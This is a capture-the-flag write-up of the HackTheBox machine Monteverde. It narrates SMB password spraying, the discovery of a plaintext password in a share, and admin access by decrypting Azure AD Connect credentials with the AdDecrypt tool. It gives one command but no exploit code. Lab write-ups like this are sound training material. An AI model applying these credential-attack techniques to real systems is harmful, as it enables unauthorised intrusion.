Summary
Monteverde is a medium-rated Windows box created by egre55. It focused mainly on weak password management and having files with plaintext credentials. Initial foothold is gained by accessing shares using a user with a password exactly the same as his username. Access to the machine is gained by discovering an xml file in one of the shares that has a plaintext password in it. Administrator privilege is obtained by decrypting an admin password from the Azure AD Connect stored in the database.
Reconnaissance
As usual, a scan for open ports and services using nmap is performed and only SMB, LDAP, and RPC are open.
I tried enumerating shares with smbmap and smbclient and anonymously but no luck finding anything.
I ran enum4linux to find anything useful and I found a few domain users.
After poking around a little more, I could not find anything else useful. I listed all users in a file and used GetNPUsers from impacket to attempt to grab a user hash but was also unsuccessful.
Initial Foothold
From this point, I was not finding any more information so I tried to do an smb login automation with metasploit with possible users and passwords.
I used the credentials I found to access shares and enumerate further.
I found some shares and accessed users$ share to find useful information.
Only mhope’s directory has a file in it. I went and downloaded the file and discovered his password inside the xml file.
Gaining User Access
I used the newly found credentials to gain access to the machine using evil-winrm and grabbed the user.txt flag.
From here I enumerated the programs installed in the machine to see if there is anything that is not usually installed by default and found Microsoft Azure Active Directory Connect and few more Azure AD directories.
I tried to poke around and try to find a version number so I can try to find a vulnerability for it but I could not find a file that can give me the version installed nor do I know if it even exists. So I just went and attempted to look up ‘Azure active directory exploit’ and found a few links to decrypting azure ad credentials.
Gaining Root Access
I focused mainly on this article which has a proof of concept that I used to gain administrative access. I went and downloaded the POC from his github repo, unzipped it, and transferred it to the target machine.
I created a temp directory in C: and that’s where I placed the downloaded files.
Basically, the exploit will login to the database locally, query the information needed to decrypt the password such as the keyset_id, and instance_id from the mms_server_configuration. As well as the private_configuration_xml and encrypted_configuration from mms_management_agent. The mcrypt.dll file which was downloaded alongside the AdDecrypt.exe will be the module that is responsible for decrypting the encrypted configuration.
In order for this attack to be successful, the current working directory should be “C:\Program Files\Microsoft Azure AD Sync\Bin”. From there, the exploit is executed by using its full path ‘c:/temp/AdDecrypt.exe -FullSQL’
It successfully decrypts the password which can now be used to login to evil-winrm, gain administrative privileges, and finish off by grabbing the root.txt flag.
Thank you for reading! I would appreciate it a lot if readers can give some feedbacks and tips on how to get better and what alternatives I should have taken in order to approach this box. Have a nice day!
